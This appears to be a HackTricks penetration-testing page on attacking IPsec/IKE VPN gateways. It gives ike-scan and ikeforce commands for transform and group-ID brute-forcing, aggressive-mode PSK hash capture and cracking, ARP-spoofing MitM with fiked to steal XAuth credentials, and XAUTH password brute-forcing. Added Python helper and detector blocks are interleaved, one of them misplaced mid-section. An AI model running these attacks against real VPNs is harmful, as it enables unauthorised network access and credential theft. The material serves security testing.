# 500/udp - Pentesting IPsec/IKE VPN
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## Basic Information
**IPsec** is widely recognised as the main technology for securing communications between networks (LAN-to-LAN) and from remote users to a network gateway (remote access), and it is the foundation of enterprise VPN solutions.
The establishment of a **security association (SA)** between two endpoints is handled by **IKE**, which runs under the umbrella of ISAKMP, a protocol designed for authentication and key exchange. The process takes place in several phases:
* **Phase 1:** A secure channel is established between the two endpoints. This is done with either Pre-Shared Keys (PSK) or certificates, using main mode, which consists of three pairs of messages, or **aggressive mode**.
* **Phase 1.5:** Although optional, this phase, known as the Extended Authentication phase, verifies the identity of the connecting user by requiring a username and password.
* **Phase 2:** This phase negotiates the parameters for protecting the data with **ESP** and **AH**. It may use algorithms different from those of Phase 1 in order to provide **Perfect Forward Secrecy (PFS)**, which strengthens the security.
**Default port:** 500/udp
## **Discover** the service using nmap
```
root@bt:~# nmap -sU -p 500 172.16.21.200
Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST
Nmap scan report for 172.16.21.200
Host is up (0.00036s latency).
PORT STATE SERVICE
500/udp open isakmp
MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)
```
## **Finding a valid transformation**
The IPsec configuration can be set up to accept only one or a few transformations. A transformation is a combination of values. **Each transformation** contains a number of attributes, such as DES or 3DES as the **encryption algorithm**, SHA or MD5 as the **integrity algorithm**, a pre-shared key as the **authentication type**, Diffie-Hellman 1 or 2 as the **key distribution algorithm** and 28800 seconds as the **lifetime**.
So, the first thing you have to do is **find a valid transformation** so that the server will talk to you. To do so you can use the tool **ike-scan**. By default ike-scan works in main mode and sends a packet to the gateway with an ISAKMP header and a single proposal with **eight transformations inside it**.
Depending on the response you can obtain some information about the endpoint:
```
root@bt:~# ike-scan -M 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200 Main Mode Handshake returned
HDR=(CKY-R=d90bf054d6b76401)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify
```
As you can see in the previous response, there is a field called **AUTH** with the value **PSK**. This means that the VPN is configured with a pre-shared key (and this is really good for a pentester).\
**The value of the last line is also very important:**
* _0 returned handshake; 0 returned notify:_ This means the target **is not an IPsec gateway**.
* _**1 returned handshake; 0 returned notify:**_ This means the **target is configured for IPsec and is willing to perform IKE negotiation, and one or more of the transformations you proposed are acceptable** (a valid transformation will be shown in the output).
* _0 returned handshake; 1 returned notify:_ VPN gateways respond with a notify message when **none of the transformations are acceptable** (though some gateways do not respond at all; in that case further analysis and a revised proposal should be tried).
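As an added example (not part of the original page), a short Python parser for the ike-scan output above: it maps the closing `N returned handshake; M returned notify` line to the three outcomes just listed, extracts the accepted `SA=(...)` attributes, and reports the findings a gateway owner would want to fix. The sample output is the run shown above, embedded as a constructed string.

```python
import re

# Constructed sample: the main-mode result of the ike-scan run shown above, verbatim.
SAMPLE_OUTPUT = """\
172.16.21.200 Main Mode Handshake returned
HDR=(CKY-R=d90bf054d6b76401)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify
"""

SUMMARY_RE = re.compile(r"(\d+) returned handshake; (\d+) returned notify")
SA_RE = re.compile(r"SA=\((.*?)\)")


def classify(output):
    """Map ike-scan's closing summary line to the three outcomes listed above."""
    m = SUMMARY_RE.search(output)
    if m is None:
        raise ValueError("no ike-scan summary line in output")
    handshakes, notifies = int(m.group(1)), int(m.group(2))
    if handshakes > 0:
        return "handshake"  # IPsec gateway, and at least one proposed transform was accepted
    if notifies > 0:
        return "notify"     # IPsec gateway, but none of the proposed transforms was accepted
    return "no-ipsec"       # no IKE reply at all: the target is probably not an IPsec gateway


def parse_sa(output):
    """Return the accepted transform's attributes as a dict (empty if no SA payload came back)."""
    m = SA_RE.search(output)
    return dict(kv.split("=", 1) for kv in m.group(1).split()) if m else {}


def audit(output):
    """Findings a gateway owner would want to fix, judged from the returned SA payload alone."""
    sa = parse_sa(output)
    findings = []
    if sa.get("Auth") == "PSK":
        findings.append("PSK authentication: the group secret becomes crackable offline if aggressive mode is allowed")
    if sa.get("Group", "").split(":")[-1] in ("modp768", "modp1024"):
        findings.append("DH group 1/2 (1024-bit MODP or smaller): move to group 14 or larger")
    if sa.get("Enc") == "DES":
        findings.append("single DES encryption")
    if sa.get("Hash") == "MD5":
        findings.append("MD5 integrity")
    return findings
```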
Then, in this case we already have a valid transformation but if you are in the 3rd case, then you need to **brute-force a little bit to find a valid transformation:**
First of all you need to create all the possible transformations:
```bash
for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done
```
Then brute-force each of them with ike-scan (this can take several minutes):
```bash
# Replace [VPN_GATEWAY_IP] with the address of the target gateway
while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M $line [VPN_GATEWAY_IP]) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt
```
If the brute-force didn't work, maybe the server answers without handshakes even to valid transformations. Then you can try the same brute-force but using aggressive mode:
```bash
# Replace [VPN_GATEWAY_IP] with the address of the target gateway; the output file is given as --pskcrack=handshake.txt so the file name is bound to the option
while read line; do (echo "Valid trans found: $line" && ike-scan -M --aggressive --pskcrack=handshake.txt $line [VPN_GATEWAY_IP]) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt
```
Hopefully **a valid transformation is returned**.\
You can try the **same attack** using [**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py).\
You could also try to brute-force transformations with [**ikeforce**](https://github.com/SpiderLabs/ikeforce):
```bash
./ikeforce.py # No parameters are required for scan -h for additional help
```
![](<../.gitbook/assets/image (617).png>)
In the screenshot above, **DH Group: 14 = 2048-bit MODP** and **15 = 3072-bit**\
**2 = HMAC-SHA = SHA1 (in this case). The format of `--trans` is $Enc,$Hash,$Auth,$DH**
Cisco advises against using DH groups 1 and 2 because they are not strong enough. Experts believe that **well-resourced nation states can easily break the encryption** of data that uses these weak groups. This is done with a one-off precomputation against the group that afterwards makes breaking individual key exchanges fast. Although that precomputation is very expensive, it lets such states read encrypted traffic in real time whenever it uses a weak group (1,024-bit or smaller).
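Added example, not from the page: decoding the numeric `--trans` fields into names with the IKEv1 attribute tables (it goes beyond the screenshot above by covering the full range of values the dictionary loop iterates over), and the reverse step of turning the `SA=(...)` line ike-scan returns into the `--trans` value that reproduces it. The `KeyLength` handling assumes ike-scan reports the AES/Camellia key size as a separate attribute.

```python
import re

# IKEv1 transform attribute values for the four --trans fields (IANA "IPsec SA Attributes"
# registry, the same numbering the dictionary loop above iterates over).
ENC = {1: "DES", 2: "IDEA", 3: "Blowfish", 4: "RC5", 5: "3DES", 6: "CAST", 7: "AES", 8: "Camellia"}
HASH = {1: "MD5", 2: "SHA1", 3: "Tiger", 4: "SHA2-256", 5: "SHA2-384", 6: "SHA2-512"}
AUTH = {1: "PSK", 2: "DSS-sig", 3: "RSA-sig", 4: "RSA-enc", 5: "RSA-enc-revised",
        6: "ElGamal-enc", 7: "ElGamal-enc-revised", 8: "ECDSA-sig",
        64221: "HybridInitRSA", 64222: "HybridRespRSA", 64223: "HybridInitDSS", 64224: "HybridRespDSS",
        65001: "XAUTHInitPreShared", 65002: "XAUTHRespPreShared", 65003: "XAUTHInitDSS",
        65004: "XAUTHRespDSS", 65005: "XAUTHInitRSA", 65006: "XAUTHRespRSA",
        65007: "XAUTHInitRSAEncryption", 65008: "XAUTHRespRSAEncryption",
        65009: "XAUTHInitRSARevisedEncryption", 65010: "XAUTHRespRSARevisedEncryption"}
GROUP = {1: "modp768", 2: "modp1024", 3: "ec2n155", 4: "ec2n185", 5: "modp1536", 14: "modp2048",
         15: "modp3072", 16: "modp4096", 17: "modp6144", 18: "modp8192",
         19: "ecp256", 20: "ecp384", 21: "ecp521"}


def decode_trans(trans):
    """'5,2,1,2' -> ('3DES', 'SHA1', 'PSK', 'modp1024'); AES/Camellia carry a key length as '7/128'.
    Unassigned numbers (e.g. DH groups 6-13 in the loop above) are returned as 'groupN' etc."""
    enc, hsh, auth, grp = trans.split(",")
    enc_id, _, keylen = enc.partition("/")
    enc_name = ENC.get(int(enc_id), f"enc{enc_id}") + (f"-{keylen}" if keylen else "")
    return (enc_name, HASH.get(int(hsh), f"hash{hsh}"),
            AUTH.get(int(auth), f"auth{auth}"), GROUP.get(int(grp), f"group{grp}"))


def sa_to_trans(sa_line):
    """Turn the SA=(...) line ike-scan returns into the --trans value that reproduces it."""
    attrs = dict(kv.split("=", 1) for kv in re.search(r"SA=\((.*?)\)", sa_line).group(1).split())
    enc_id = {v: k for k, v in ENC.items()}[attrs["Enc"]]
    # Assumption: a KeyLength attribute, if ike-scan prints one, holds the AES/Camellia key size.
    enc = f"{enc_id}/{attrs['KeyLength']}" if "KeyLength" in attrs else str(enc_id)
    hsh = {v: k for k, v in HASH.items()}[attrs["Hash"]]
    auth = {v: k for k, v in AUTH.items()}[attrs["Auth"]]
    grp = attrs["Group"].split(":")[0]  # ike-scan prints the group as '2:modp1024'
    return f"{enc},{hsh},{auth},{grp}"
```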
### Server fingerprinting
Next, you can use ike-scan to try to **identify the vendor** of the device. The tool sends an initial proposal and then stops replying, so the server retransmits its response. By analysing the **time** **difference** **between** the **messages** received from the server and matching it against known response patterns, the pentester can fingerprint the VPN gateway vendor. Moreover, some VPN servers include the optional **Vendor ID (VID) payload** in their IKE replies.
**Specify the valid transformation if needed** (using --trans)
If ike-scan identifies the vendor, it will print it:
```
root@bt:~# ike-scan -M --showbackoff 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200 Main Mode Handshake returned
HDR=(CKY-R=4f3ec84731e2214a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
IKE Backoff Patterns:
IP Address No. Recv time Delta Time
172.16.21.200 1 1322286031.744904 0.000000
172.16.21.200 2 1322286039.745081 8.000177
172.16.21.200 3 1322286047.745989 8.000908
172.16.21.200 4 1322286055.746972 8.000983
172.16.21.200 Implementation guess: Cisco VPN Concentrator
Ending ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify
```
This can also be done with the nmap script _**ike-version**_
## Finding the correct ID (group name)
To be allowed to capture the hash you need a valid transformation that supports aggressive mode and the correct ID (group name). You probably won't know the valid group name, so you will have to brute-force it.\
To do so, I would recommend two methods:
### Brute-forcing the ID with ike-scan
First of all, try to make a request with a fake ID while trying to gather the hash ("-P"):
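The backoff matching described above, as an added example that is not ike-scan's own code: it recomputes the gaps from the `Recv time` column of the run above and compares them with a pattern table. Only the Cisco VPN Concentrator pattern that run demonstrates (constant 8 s retransmits) is included; ike-scan ships a far larger table in its own backoff patterns file, and the 0.5 s jitter tolerance is an assumption.

```python
import re

# Constructed sample: the "IKE Backoff Patterns" table from the --showbackoff run above.
BACKOFF_OUTPUT = """\
IKE Backoff Patterns:
IP Address No. Recv time Delta Time
172.16.21.200 1 1322286031.744904 0.000000
172.16.21.200 2 1322286039.745081 8.000177
172.16.21.200 3 1322286047.745989 8.000908
172.16.21.200 4 1322286055.746972 8.000983
"""

ROW_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\d+\.\d+)\s+\d+\.\d+$", re.MULTILINE)

# Seconds between successive retransmissions of the first reply, per implementation.
# Only the pattern the run above demonstrates is included; ike-scan's own backoff
# patterns file is far larger.
KNOWN_PATTERNS = {
    "Cisco VPN Concentrator": [8.0, 8.0, 8.0],
}


def deltas_by_host(output):
    """Recompute the Delta Time column from the absolute Recv time values, per host."""
    times = {}
    for host, _, recv in ROW_RE.findall(output):
        times.setdefault(host, []).append(float(recv))
    return {h: [round(b - a, 3) for a, b in zip(t, t[1:])] for h, t in times.items()}


def guess_implementation(deltas, tolerance=0.5):
    """Name the implementation whose retransmit gaps match, allowing `tolerance` seconds of jitter."""
    for name, pattern in KNOWN_PATTERNS.items():
        if len(pattern) == len(deltas) and all(abs(o - e) <= tolerance for o, e in zip(deltas, pattern)):
            return name
    return None
```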
```bash
ike-scan -P -M -A -n fakeID [VPN_GATEWAY_IP]
```
If **no hash is returned**, then this brute-forcing method will probably work. **If some hash is returned, it means a fake hash is sent back even for a fake ID, so this method won't be reliable** for brute-forcing the ID. For example, a fake hash may be returned (this happens in modern versions):
![](<../.gitbook/assets/image (917).png>)
But as I said, if no hash is returned, you should try brute-forcing common group names with ike-scan.
This script **will try to brute-force possible IDs** and returns the IDs for which a valid handshake comes back (that will be a valid group name).
If you have found a specific transformation, add it to the ike-scan command. And if you have found several transformations, feel free to add a new loop to try them all (you should try them all until one of them works properly).
You can use the [ikeforce dictionary](https://github.com/SpiderLabs/ikeforce/blob/master/wordlists/groupnames.dic) or [the one in SecLists](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/ike-groupid.txt) of common group names to brute-force them:
```bash
# Replace [VPN_GATEWAY_IP] with the address of the target gateway
while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line [VPN_GATEWAY_IP]) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt
```
Or use this dictionary (a combination of the other two without duplicates):
{% file src="../.gitbook/assets/vpnIDs.txt" %}
### Bruteforcing ID with Iker
[**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py) also uses **ike-scan** to brute-force possible group names. It follows its own method for **finding a valid ID based on the output of ike-scan**.
### Bruteforcing ID with ikeforce
[**ikeforce.py**](https://github.com/SpiderLabs/ikeforce) is a tool that can be used to **brute-force IDs too**. It tries to **exploit different weaknesses** that can be used to **distinguish between a valid and an invalid ID** (it can produce false positives and false negatives, which is why I prefer the ike-scan method when possible).
By default **ikeforce** first sends some random IDs to check how the server behaves and decide which technique to use.
* The **first** method brute-forces the group names by **looking for** the **Dead Peer Detection (DPD)** information of Cisco systems (the server only returns this information when the group name is correct).
* The **second** method available is to **check the number of responses sent to each attempt**, because sometimes more packets are sent when the correct ID is used.
* The **third** method consists of **looking for "INVALID-ID-INFORMATION" in the response to an incorrect ID**.
* Finally, if the server returns nothing to the checks, **ikeforce** will try to brute-force the server and check whether the server replies with some packet when the correct ID is sent.\
Obviously, the goal of brute-forcing the ID is to get the **PSK** once you have a valid ID. Then, with the **ID** and the **PSK** you will have to brute-force XAUTH (if it is enabled).
If you have found a specific transformation, add it to the ikeforce command. And if you have found several transformations, feel free to add a new loop to try them all (you should try them all until one of them works properly).
```bash
git clone https://github.com/SpiderLabs/ikeforce.git
pip install 'pyopenssl==17.2.0' # The tool is old and needs this version of the library
```
```bash
./ikeforce.py [VPN_GATEWAY_IP] -e -w ./wordlists/groupnames.dic
```
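From the defender's side, the ID and transform brute-forcing described in this section has a simple signature. As an added example (not part of the page or of ikeforce), a detector over constructed IKEv1 exchange records in an assumed tuple format rather than any real daemon's log: it alerts on a source that sends many distinct aggressive-mode IDs, or has many main-mode proposals rejected, inside a short window.

```python
from collections import defaultdict

# Constructed sample of IKEv1 exchange records, in an assumed tuple format (not any daemon's
# real log): (unix time, source IP, exchange mode, ID carried by the first aggressive-mode
# packet or None, what the gateway answered).
EVENTS = [
    (1000.0, "10.0.0.5", "aggressive", "vpngroup", "handshake"),            # legitimate client
    (1001.0, "10.0.0.9", "aggressive", "admin", "INVALID-ID-INFORMATION"),
    (1001.2, "10.0.0.9", "aggressive", "vpn", "INVALID-ID-INFORMATION"),
    (1001.4, "10.0.0.9", "aggressive", "cisco", "INVALID-ID-INFORMATION"),
    (1001.6, "10.0.0.9", "aggressive", "test", "INVALID-ID-INFORMATION"),
    (1001.8, "10.0.0.9", "aggressive", "vpngroup", "handshake"),            # the guess that worked
] + [
    # one source walking a transform dictionary in main mode: every proposal is rejected
    (2000.0 + i * 0.05, "10.0.0.7", "main", None, "notify") for i in range(25)
]


def detect(events, window=60.0, id_threshold=4, proposal_threshold=20):
    """Flag a source that, inside `window` seconds, tries many distinct aggressive-mode IDs
    (group-name brute force) or has many main-mode proposals rejected (transform brute force)."""
    by_src = defaultdict(list)
    for ev in sorted(events, key=lambda e: e[0]):
        by_src[ev[1]].append(ev)
    alerts = []
    for src, evs in by_src.items():
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:  # slide the window's left edge
                start += 1
            win = evs[start:end + 1]
            ids = {e[3] for e in win if e[2] == "aggressive"}
            rejected = sum(1 for e in win if e[2] == "main" and e[4] == "notify")
            if len(ids) >= id_threshold:
                alerts.append((src, "aggressive-id-bruteforce", len(ids)))
                break  # one alert per source is enough
            if rejected >= proposal_threshold:
                alerts.append((src, "main-mode-transform-bruteforce", rejected))
                break
    return alerts
```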
### Sniffing the ID
(From the book **Network Security Assessment: Know Your Network**): It is also possible to obtain valid usernames by sniffing the connection between the VPN client and the server, since the first aggressive-mode packet, which contains the client ID, is sent in the clear.
![](<../.gitbook/assets/image (891).png>)
## Capturing & cracking the hash
Finally, if you have found a **valid transformation** and the **group name**, and if **aggressive mode is allowed**, then you can very easily grab a crackable hash:
```bash
ike-scan -M -A -n [GROUP_ID] --pskcrack=hash.txt [VPN_GATEWAY_IP] # If aggressive mode is supported and you know the ID, you can get the hash of the password
```
The hash will be saved in _hash.txt_.
You can use **psk-crack**, **john** (using [**ikescan2john.py**](https://github.com/truongkma/ctf-tools/blob/master/John/run/ikescan2john.py)) and **hashcat** to **crack** the hash:
```bash
psk-crack -d [WORDLIST_PATH] hash.txt # dictionary attack on the hash file saved by ike-scan
```
## **XAuth**
**Aggressive mode IKE** combined with a **Pre-Shared Key (PSK)** is commonly used for **group authentication**. This method is augmented by **XAuth (Extended Authentication)**, which adds a layer of **user authentication**. That authentication typically relies on services such as **Microsoft Active Directory**, **RADIUS** or similar systems.
With the move to **IKEv2**, a notable change is that **EAP (Extensible Authentication Protocol)** replaces **XAuth** for authenticating users. This change reflects the evolution of authentication practices within secure communication protocols.
### Local network MitM to capture credentials
So you can capture the login data with _fiked_ and check whether there is any default username (you need to redirect the IKE traffic to `fiked` for sniffing, which can be done with ARP spoofing, [more info](https://opensourceforu.com/2012/01/ipsec-vpn-penetration-testing-backtrack-tools/)). Fiked acts as the VPN endpoint and captures the XAuth credentials:
```bash
fiked -g [VPN_GATEWAY_IP] -k testgroup:secretkey -l output.txt -d
```
Also, using IPsec, try to perform a MitM attack and block all traffic to port 500; if the IPsec tunnel cannot be established, maybe the traffic will be sent in the clear.
### Brute-forcing the XAUTH username and password with ikeforce
To brute-force **XAUTH** (once you know a valid group name **id** and the **psk**) you can use a username or a list of usernames and a list of passwords:
```bash
./ikeforce.py [VPN_GATEWAY_IP] -b -i [GROUP_ID] -u [USERNAME] -k [PSK] -w [PASSWORD_LIST] [-s 1]
```
This way, ikeforce will try to connect using every username:password combination.
If you found one or several valid transformations, just use them as in the previous steps.
## Authenticating with an IPSEC VPN
On Kali, **VPNC** is used to establish IPsec tunnels. The **profiles** must be placed in the `/etc/vpnc/` directory. You can start these profiles with the _**vpnc**_ command.
The following commands and configuration show the process of establishing a VPN connection with VPNC:
```bash
root@system:~# cat > /etc/vpnc/samplevpn.conf << STOP
IPSec gateway [VPN_GATEWAY_IP]
IPSec ID [VPN_CONNECTION_ID]
IPSec secret [VPN_GROUP_SECRET]
IKE Authmode psk
Xauth username [VPN_USERNAME]
Xauth password [VPN_PASSWORD]
STOP
root@system:~# vpnc samplevpn
VPNC started in background (pid: [PID])...
root@system:~# ifconfig tun0
```
In this setup:
* Replace `[VPN_GATEWAY_IP]` with the actual IP address of the VPN gateway.
* Replace `[VPN_CONNECTION_ID]` with the identifier for the VPN connection.
* Replace `[VPN_GROUP_SECRET]` with the VPN's group secret.
* Replace `[VPN_USERNAME]` and `[VPN_PASSWORD]` with the VPN authentication credentials.
* `[PID]` symbolizes the process ID that will be assigned when `vpnc` initiates.
Ensure that actual, secure values are used to replace the placeholders when configuring the VPN.
## Reference Material
* [PSK cracking paper](http://www.ernw.de/download/pskattack.pdf)
* [SecurityFocus Infocus](http://www.securityfocus.com/infocus/1821)
* [Scanning a VPN Implementation](http://www.radarhack.com/dir/papers/Scanning\_ike\_with\_ikescan.pdf)
* Network Security Assessment 3rd Edition
## Shodan
* `port:500 IKE`